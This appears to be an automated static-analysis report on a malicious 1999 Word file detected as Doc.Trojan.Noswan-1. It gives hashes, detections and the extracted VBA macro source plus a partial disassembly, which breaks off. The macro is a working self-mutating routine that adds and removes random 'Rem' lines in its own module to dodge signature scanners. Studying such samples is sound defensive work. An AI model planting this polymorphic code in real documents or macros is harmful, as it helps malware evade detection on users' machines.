Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bb90784d7110ef44…

MALICIOUS

Office (OLE)

43.5 KB Created: 1999-06-11 17:13:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 70d2c945e2fc7c0df728647535f2ec34 SHA-1: 6acea88e4de76b1e31780bd6604a3c07fa4a1d19 SHA-256: bb90784d7110ef448a5f9e0714605513c4738b2f66b37a31891014944bc0cb94
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is an Office document with detected VBA macros. The macro code exhibits polymorphic behavior, attempting to obfuscate itself by adding or removing 'Rem' lines. This behavior, combined with the ClamAV detections (Doc.Trojan.Noswan-1 and Win.Tool.W97M-7), strongly suggests the macro is a downloader or part of a multi-stage attack. No specific URLs or executable payloads were directly extracted, limiting the confidence in family attribution.

Heuristics 2

  • ClamAV: Doc.Trojan.Noswan-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Noswan-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4312 bytes
SHA-256: c77766fb2b1c431ebf18ed02d0b003296ccf06b7f368b48d13835acadc0c65f9
Detection
ClamAV: Win.Tool.W97M-7
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "SOPS"
Sub SomeOtherPolymorphicSystem()
On Error Resume Next

Randomize

ActiveLines = Application.VBE.ActiveVBProject.VBComponents("SOPS").CodeModule.CountOfLines

If ActiveLines > 65 Then
    
    With Application.VBE.ActiveVBProject.VBComponents("SOPS").CodeModule
    
        For TheLine = 1 To .CountOfLines
            If Left(.Lines(TheLine, 1), 3) = "Rem" Then .DeleteLines TheLine
        Next TheLine
    
    End With
    
Else
    
    With Application.VBE.ActiveVBProject.VBComponents("SOPS").CodeModule
    
        PolySize = Int(Rnd * 10)
    
        For PolyMorphic = 1 To PolySize
            
            PolyString = ""
            PolyLines = .CountOfLines
            
            RndLine = Int(Rnd * PolyLines)
            StringSize = Int(Rnd * 39) + 1
            
                For SomeString = 1 To StringSize
                    PolyString = PolyString & Chr(65 + Int(Rnd * 22)) & Chr(122 - Int(Rnd * 22))
                Next SomeString
            
            .InsertLines RndLine, "Rem " & PolyString
        
        Next PolyMorphic

    End With

End If

End Sub

' Processing file: /opt/analyzer/scan_staging/30ad7a00cd2c4669a43a5572d0b7f092.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1351 bytes
' Macros/VBA/SOPS - 15921 bytes
' Line #0:
' 	FuncDefn (Sub SomeOtherPolymorphicSystem())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' Line #3:
' 	ArgsCall Read 0x0000 
' Line #4:
' Line #5:
' 	LitStr 0x0004 "SOPS"
' 	Ld Application 
' 	MemLd VBE 
' 	MemLd ActiveVBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St ActiveLines 
' Line #6:
' Line #7:
' 	Ld ActiveLines 
' 	LitDI2 0x0041 
' 	Gt 
' 	IfBlock 
' Line #8:
' Line #9:
' 	StartWithExpr 
' 	LitStr 0x0004 "SOPS"
' 	Ld Application 
' 	MemLd VBE 
' 	MemLd ActiveVBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	With 
' Line #10:
' Line #11:
' 	StartForVariable 
' 	Ld TheLine 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	MemLdWith CountOfLines 
' 	For 
' Line #12:
' 	Ld TheLine 
' 	LitDI2 0x0001 
' 	ArgsMemLdWith Lines 0x0002 
' 	LitDI2 0x0003 
' 	ArgsLd LBound 0x0002 
' 	LitStr 0x0003 "Rem"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	Ld TheLine 
' 	ArgsMemCallWith DeleteLines 0x0001 
' 	EndIf 
' Line #13:
' 	StartForVariable 
' 	Ld TheLine 
' 	EndForVariable 
' 	NextVar 
' Line #14:
' Line #15:
' 	EndWith 
' Line #16:
' Line #17:
' 	ElseBlock 
' Line #18:
' Line #19:
' 	StartWithExpr 
' 	LitStr 0x0004 "SOPS"
' 	Ld Application 
' 	MemLd VBE 
' 	MemLd ActiveVBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	With 
' Line #20:
' Line #21:
' 	Ld Rnd 
' 	LitDI2 0x000A 
' 	Mul 
' 	FnInt 
' 	St PolySize 
' Line #22:
' Line #23:
' 	StartForVariable 
' 	Ld PolyMorphic 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld PolySize 
' 	For 
' Line #24:
' Line #25:
' 	LitStr 0x0000 ""
' 	St PolyString 
' Line #26:
' 	MemLdWith CountOfLines 
' 	St PolyLines 
' Line #27:
' Line #28:
' 	Ld Rnd 
' 	Ld PolyLines 
' 	Mul 
' 	FnInt 
' 	St RndLine 
' Line #29:
' 	Ld Rnd 
' 	LitDI2 0x0027 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0001 
' 	Add 
' 	St StringSize 
' Line #30:
' Line #31:
' 	StartForVariable 
' 	Ld SomeString 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld StringSize 
' 	For 
' Line #32:
' 	Ld PolyString 
' 	LitDI2 0x0041 
' 	Ld Rnd 
' 	LitDI2 0x0016 
' 	Mul 
' 	FnInt 
' 	Add 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitDI2 0x007A 
' 	Ld Rnd 
' 	LitDI2 0x0016 
' 	Mul 
' 	FnInt 
' 	Sub 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St PolyString 
' Line #33:
' 	StartForVariable 
' 	Ld SomeString 
' 	EndForVariable 
' 	NextVar 
' Line #34:
' Line #35:
' 	Ld RndLine 
' 	LitStr 0x0004 "Rem "
' 	Ld PolyString 
' 	Concat 
' 	ArgsMemCallWith InsertLine
... (truncated)